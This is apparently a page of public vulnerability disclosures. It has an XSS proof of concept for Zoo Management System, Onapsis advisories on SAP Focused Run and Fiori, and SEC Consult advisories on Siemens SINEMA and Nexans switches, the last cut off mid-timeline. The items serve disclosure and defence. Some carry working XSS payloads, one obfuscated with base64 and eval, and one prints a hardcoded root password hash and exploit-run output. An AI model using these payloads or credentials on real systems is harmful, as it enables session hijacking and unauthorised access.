<pre><code># Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)<br /># Date: 06/22/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Server: XAMPP on Windows 10 <br /># CVE: CVE-2022-31897<br /><br /># Description:<br />Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.<br /><br /># Impact:<br />An attacker could steal cookies with a crafted URL sent to the victims.<br /><br /># Exploit:<br /><br />Visit the following page: <br /><br />1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script><br /><br />2) Alert pop up is fired!<br /><br /><br /># Image poc:<br /><br />https://ibb.co/8XKDgJX -> Registration page<br />https://ibb.co/mTTmTmy -> XSS<br /><br /> <br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0007: Directory Traversal vulnerability in<br />SAP Focused Run (Simple Diagnostics Agent 1.0)<br /><br /><br />## Impact on Business<br /><br />Exposing the contents of a directory can lead to a disclosure of useful<br />information<br />for the attacker to devise exploits, such as creation times of files or any<br />information that may be encoded in file names. The directory listing may<br />also<br />compromise private or confidential data.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0007<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SIMPLE\_DIAGNOSTICS\_AGENT 1.0<br /><br /> (Check SAP Note 3159091 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-548<br />- CVSS v3 score: 2.7 AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N<br />- Risk Level: Low<br />- Assigned CVE: CVE-2022-27657<br />- Vendor patch Information: SAP Security NOTE 3159091<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high volume system and application monitoring, alerting<br />and<br />analytics needs.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />A path traversal exists in the Simple Diagnostic Agent service listening, by<br />default, on localhost port 3005. A local attacker, without particular<br />privileges,<br />can use it to display content of the directory as ```sapadm``` OS user.<br />Leading to<br />information disclosure of potentially sensitive data.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3159091 which provide patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3159091.<br /><br />Onapsis strongly recommends SAP customers to download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 04/12/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published<br /><br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-april-2022-focus-spring4shell-an<br />d-sap-mii<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27657<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3159091<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combine in-depth knowledge<br />and experience to deliver technical and business-context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy,<br />from the core to the cloud. The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0005: Cross-Site Scripting (XSS)<br />vulnerability in SAP Fiori launchpad<br /><br /><br />## Impact on Business<br /><br />Impact depends on the victim's privileges. In most cases, a successful<br />attack<br />allows an attacker to hijack a session, or force the victim to perform<br />undesired<br />requests in the SAP System (CSRF) as well as redirected to arbitrary web<br />site<br />(Open Redirect).<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0005<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SAP\_UI 753<br /> - SAP\_UI 754<br /> - SAP\_UI 755<br /> - SAP\_UI 756<br /> - SAP\_BASIS 787<br /><br /> (Check SAP Note 3149805 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-79<br />- CVSS v3 score: 8.2 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N<br />- Risk Level: High<br />- Assigned CVE: CVE-2022-26101<br />- Vendor patch Information: SAP Security NOTE 3149805<br /><br /><br />## Affected Components Description<br /><br />SAP Fiori launchpad is the entry point to ABAP platform for SAP Fiori apps<br />on<br />mobile and desktop devices.<br /><br /><br />## Vulnerability Details<br /><br />During the navigation in SAP Fiori Launchpad, it is possible to provide a<br />custom<br />theme name using the url parameter ```sap-theme```. This parameter has an<br />option to provide the path to a .css file, which it is used directly in the<br />page<br />generation. This optional input is not sufficiently sanitized, allowing an<br />attacker to<br />control and craft any kind of html payload in the page requested.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3149805 which provide patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3149805.<br /><br />Onapsis strongly recommends SAP customers to download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/09/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec<br />ted-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26101<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3149805<br />- Vendor FAQ:<br />https://launchpad.support.sap.com/#/notes/3157089<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combine in-depth knowledge<br />and experience to deliver technical and business-context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy,<br />from the core to the cloud. The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0004: Missing Authentication check in SAP<br />Focused Run (Simple Diagnostics Agent 1.0)<br /><br /><br />## Impact on Business<br /><br />Because the Simple Diagnostic Agent (SDA) handles several important<br />configuration and critical credential information, a successful attack<br />could lead to the control of the SDA, and therefore affect:<br /> * Integrity, by modifying the configuration.<br /> * Availability, by stopping the service.<br /> * Confidentiality and Scope changing, by decrypting all stored<br />credentials. Then<br />accessing the SAP Focused Run system as well as the SAP system managed by<br />the<br />SDA.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0004<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SIMPLE\_DIAGNOSTICS\_AGENT 1.0<br /><br /> (Check SAP Note 3145987 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-306<br />- CVSS v3 score: 9.3 AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H<br />- Risk Level: Critical<br />- Assigned CVE: CVE-2022-24396<br />- Vendor patch Information: SAP Security NOTE 3145987<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high volume system and application monitoring, alerting<br />and<br />analytics needs.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />Vulnerability 1:<br /><br />No authentication is required to interact with the Simple Diagnostic Agent<br />http<br />service on port 3005 by default. Therefore, unauthenticated attackers will<br />have<br />full access to either administrative or other privileged functionalities.<br />Leveraging<br />this access, they would be able to read, modify or delete sensitive<br />information and<br />configurations with sapadm OS user privileges.<br /><br />Vulnerability 2:<br /><br />A path traversal exists in the Simple Diagnostic Agent service listening, by<br />default, on localhost port 3005. A local attacker, without particular<br />privileges,<br />can abuse this flaw in order to display the content of any OS directory<br />which ```sapadm```<br />has access to. Leading to information disclosure of potentially sensitive<br />data.<br /><br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3145987 which provide patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3145987.<br /><br />Onapsis strongly recommends SAP customers to download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published.<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec<br />ted-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24396<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3145987<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combine in-depth knowledge<br />and experience to deliver technical and business-context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy,<br />from the core to the cloud. The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0003: Cross-Site Scripting (XSS)<br />vulnerability in SAP Focused Run (Real User Monitoring)<br /><br /><br />## Impact on Business<br /><br />Impact depends on the victim's privileges. In most cases, a successful<br />attack<br />allows an attacker to hijack a session, or force the victim to perform<br />undesired request<br />in SAP Focused Run.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0003<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - FRUN 2.00<br /> - FRUN 3.00<br /><br /> (Check SAP Note 3147283 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-79<br />- CVSS v3 score: 5.4 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N<br />- Risk Level: Medium<br />- Assigned CVE: CVE-2022-24399<br />- Vendor patch Information: SAP Security NOTE 3147283<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high volume system and application monitoring, alerting<br />and<br />analytics needs.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />The SAP Focused Run REST service ```/sap/bc/rest/rumupload``` do not<br />sufficiently sanitize an input in the multipart/form-data leading to<br />Cross-Site<br />Scripting (XSS) vulnerability from the error page generated.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3147283 which provide patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3147283.<br /><br />Onapsis strongly recommends SAP customers to download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published.<br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec<br />ted-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24399<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3147283<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combine in-depth knowledge<br />and experience to deliver technical and business-context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy,<br />from the core to the cloud. The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220614-0 ><br />=======================================================================<br /> title: Reflected Cross Site Scripting<br /> product: SIEMENS-SINEMA Remote Connect<br /> vulnerable version: <=V3.0.1.0-01.01.00.02<br /> fixed version: V3.1.0<br /> CVE number: CVE-2022-29034<br /> impact: medium<br /> homepage: https://siemens.com<br /> found: 2022-03-01<br /> by: S. Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Siemens is a technology company focused on industry, infrastructure,<br />transport, and healthcare.<br /> From more resource-efficient factories, resilient supply chains, and smarter<br />buildings and grids, to cleaner and more comfortable transportation as well as<br />advanced healthcare, we create technology with purpose adding real value for<br />customers. By combining the real and the digital worlds, we empower our<br />customers to transform their industries and markets, helping them to transform<br />the everyday for billions of people."<br /><br />"SINEMA Remote Connect is the management platform for remote networks. It is a<br />server application that enables the simple management of tunnel connections<br />(VPN) between headquarters, service technicians, and installed machines or<br />plants."<br /><br /><br />Source: https://www.siemens.com<br />Source: <br />https://new.siemens.com/global/en/products/automation/industrial-communication/industrial-remote-communication/remote-networks/sinema-remote-connect-access-service.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected Cross Site Scripting (CVE-2022-29034)<br />The application contains a reflected cross-site-scripting vulnerability that<br />can be used to execute JavaScript code in the victim's browser.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected Cross Site Scripting (CVE-2022-29034)<br />The error occurs when setting the syslog server to an illegal IP address. An<br />error message will pop up and will reflect the supplied IP address. However,<br />the popup message does not use the proper JQuery method, and thus allows to<br />inject JavaScript code. Note that dots can not be used in the JavaScript<br />payload, as they will get filtered by the IP parser that runs beforehand.<br />This was circumvented by supplying the JavaScript code in base64.<br /><br />Following request can be used to trigger the XSS:<br /><br />POST /services/syslog_client_settings HTTP/1.1<br />Host: $host<br />Cookie: sessionid=708xmctjzk39og596jp4q4r1udfom4l5;<br />csrftoken=sP8NzwJozla1k18xrRzsXiY0zq16IyBddtlDA1C5BC1Orf0oGcqUPr2bpUv1VGLu<br />Content-Length: 153<br />X-Requested-With: XMLHttpRequest<br />X-Csrftoken: U5AQMbPh3JTcdfdBkgIvaLtoitpS7jUVFJNGNGIY50KZkt5szBzX2Uxz8XTNkr4c<br />Referer: https://$host/services/syslog_client_settings<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>&port=1234&pr<br />otocol=tcp&client_authentication=false&certificate=62&mode=<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* V3.0.1.0-01.01.00.02<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Sending advisory via productcert@siemens.com<br />2022-04-01: Issue tracked by Siemens under case #29947<br />2022-04-19: Siemens confirms vulnerability. Patch available mid May.<br /> Coordinated advisory release date for 2022-06-14.<br />2022-06-07: Asking for fixed versions & CVE numbers.<br />2022-06-14: Coordinated advisory release.<br /><br /><br />Solution:<br />---------<br />Version V3.1.0 fixes our identified issues as well as other security<br />vulnerabilities according to the vendor. The firmware can be downloaded here:<br />https://support.industry.siemens.com/cs/ww/en/view/109811169/<br /><br />The vendor published a security advisory as well:<br />https://cert-portal.siemens.com/productcert/html/ssa-484086.html<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220615-0 ><br />=======================================================================<br /> title: Hardcoded Backdoor User and Outdated Software Components<br /> product: Nexans FTTO GigaSwitch industrial/office switches HW version 5<br /> vulnerable version: See "Vulnerable / tested versions"<br /> fixed version: V6.02N, V7.02<br /> CVE number: CVE-2022-32985<br /> impact: High<br /> homepage: https://www.nexans.com/<br /> found: 2020-05-25<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"As a global player in the cable industry, Nexans is behind the scenes<br />delivering the innovative services and resilient products that carry thousands<br />of watts of energy and terabytes of data per second around the world. Millions<br />of homes, cities, businesses are powered every day by Nexans’ high-quality<br />sustainable cabling solutions. We help our customers meet the challenges they<br />face in the fields of energy infrastructure, energy resources, transport,<br />buildings, telecom and data, providing them with solutions and services for the<br />most complex cable applications in the most demanding environments."<br /><br />Source: https://www.nexans.com/company/What-we-do.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult recommends to perform a thorough security review of these<br />products conducted by security professionals to identify and resolve all<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Outdated Vulnerable Software Components<br />A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that<br />are used in the devices' firmware. Four of them were verified by using the<br />MEDUSA scalable firmware runtime.<br /><br /><br />2) Hardcoded Backdoor User (CVE-2022-32985)<br />A hardcoded root user was found in "/etc/passwd". In combination with the<br />invoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port<br />50201 and 50200 to login on a system shell.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Outdated Vulnerable Software Components<br />Based on an automated scan with the IoT Inspector (ONEKEY) the following third party<br />software packages were found to be outdated:<br /><br />Firmware version 6.02L:<br />BusyBox 1.20.2<br />Dropbear SSH 2012.55<br />GNU glibc 2.17<br />lighttpd 1.4.48<br />OpenSSL 1.0.2h<br /><br />The following CVEs were verified with MEDUSA scalable firmware emulation:<br /><br />* CVE-2015-9261 (Unzip)<br />The crafted ZIP archive "x_6170921383890712452.bin" was taken from:<br />https://www.openwall.com/lists/oss-security/2015/10/25/3<br />Execution inside the firmware emulation:<br /><br />bash-4.2# unzip x_6170921383890712452.bin<br />Archive: x_6170921383890712452.bin<br /> inflating: ]3j½r«IK-%Ix<br />do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc<br />epc = 0044bb28 in busybox[400000+99000]<br />ra = 0044b968 in busybox[400000+99000]<br />Segmentation fault<br /><br /><br />* CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)<br /><br />PoC code was taken from:<br />https://gist.github.com/dweinstein/66e6a088191ac0e8105c<br /><br /><br />* CVE-2015-7547 (getaddrinfo buffer overflow)<br /><br />PoC code was taken from:<br />https://github.com/fjserna/CVE-2015-7547<br /><br />-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &<br />[1] 259<br />-bash-4.4# chroot /medusa_rootfs/ bin/bash<br />bash-4.2# cd /medusa_exploits/<br />bash-4.2# ./cve-2015-7547_glibc_getaddrinfo<br />[UDP] Total Data len recv 36<br />[UDP] Total Data len recv 36<br />Connected with 127.0.0.1:34356<br />[TCP] Total Data len recv 76<br />[TCP] Request1 len recv 36<br />[TCP] Request2 len recv 36<br />Segmentation fault<br /><br /><br />* CVE-2017-16544 (shell autocompletion vulnerability)<br /><br />A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the<br />vulnerability.<br />-------------------------------------------------------------------------------<br /># ls "pressing <TAB>"<br />test<br />]55;test.txt<br />#<br />-------------------------------------------------------------------------------<br /><br /><br />2) Hardcoded Backdoor User (CVE-2022-32985)<br />The hardcoded system user, reachable via the dropbear SSH daemon was found due<br />to multiple indications on the system. The undocumented root user itself was<br />contained in the "passwd" file:<br /><br />Content of the file "/etc/passwd".<br />-------------------------------------------------------------------------------<br />root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh<br />[...]<br />-------------------------------------------------------------------------------<br /><br />A suspicious port for the SSH daemon was chosen in the config file of dropbear:<br /><br />Content of the file "/etc/init.d/dropbear":<br />-------------------------------------------------------------------------------<br />PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin<br />DAEMON=/usr/sbin/dropbear<br />NAME=dropbear<br />DESC="Dropbear SSH server"<br />PIDFILE=/var/run/dropbear.pid<br /><br />DROPBEAR_PORT="50200 -p 50201"<br />[...]<br />-------------------------------------------------------------------------------<br /><br />This is invoked from "/usr/lib/libnx_apl.so.0.0.0", which can be seen in the<br />following pseudo-code:<br />-------------------------------------------------------------------------------<br />void dropbear_server_init(char param_1)<br /><br />{<br /> __pid_t __pid;<br /> char *pcVar1;<br /> int aiStack16 [2];<br /><br /> __pid = fork();<br /> if (__pid == 0) {<br /> __pid = fork();<br /> if (__pid != 0) {<br /> /* WARNING: Subroutine does not return */<br /> exit(0);<br /> }<br /> if (param_1 == '\0') {<br /> pcVar1 = "/etc/init.d/dropbear stop";<br /> }<br /> else {<br /> pcVar1 = "/etc/init.d/dropbear start"; <---<br /> }<br /> execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);<br /> }<br /> else {<br /> waitpid(__pid,aiStack16,0);<br /> }<br /> return;<br />}<br />-------------------------------------------------------------------------------<br /><br /><br />This function is called if a specific command is issued in the CLI interface:<br />-------------------------------------------------------------------------------<br />[...]<br /> iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);<br /> if (iVar6 != 0) {<br /> if (param_2 < 4) {<br /> netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");<br /> iVar6 = shared_mem_get_addr(&var_shm);<br /> iVar7 = shared_mem_get_addr(&var_shm);<br /> uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);<br /> shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);<br /> return;<br /> }<br /> iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);<br /> if (iVar6 != 0) {<br /> dropbear_server_init('\x01'); <---<br /> netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");<br /> return;<br /> }<br /> iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);<br /> if (iVar6 != 0) {<br /> dropbear_server_init('\0'); <---<br /> netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");<br /> return;<br /> }<br /> netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");<br /> return;<br />[...]<br />-------------------------------------------------------------------------------<br />The mentioned library is used in the CLI program that is running on the device.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following firmware versions have been tested:<br /><br />* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L<br />* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2020-05-28: Contacting the vendor's PSIRT under the following link:<br /> http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail<br /> No answer.<br />2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended<br /> deadline by 11 days.<br />2020-06-16: Telephone call with Nexans representative. Security advisory was<br /> received. It will be reviewed to confirm the found issues.<br />2020-06-26: Telephone call with Nexans representative. Nexans is working on the<br /> reported issues and will remove the dropbear daemon as first<br /> measure.<br />2020-08-04: Vendor stated that a fix for the outdated software components will<br /> be available in November.<br />2020-11-12: Asked for status update.<br />2020-11-16: Contact stated, that firmware test will need more time. Updates are<br /> estimated to be ready in Q1 of 2020.<br />2020-11-20: Vendor confirmed Q1 as estimated disclosure date.<br />2021-01-21: Asked for status update; Vendor stated that the release with all<br /> fixes is aimed to be published end of Q1.<br />2021-03-09: Asked for status update.<br />2021-03-17: Vendor stated that the firmware is in testing stage. The fixed<br /> firmware will be released in May.<br />2021-06-10: Asked for status update.<br />2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and<br /> homeschooling. The fixed firmware will be released end of August.<br 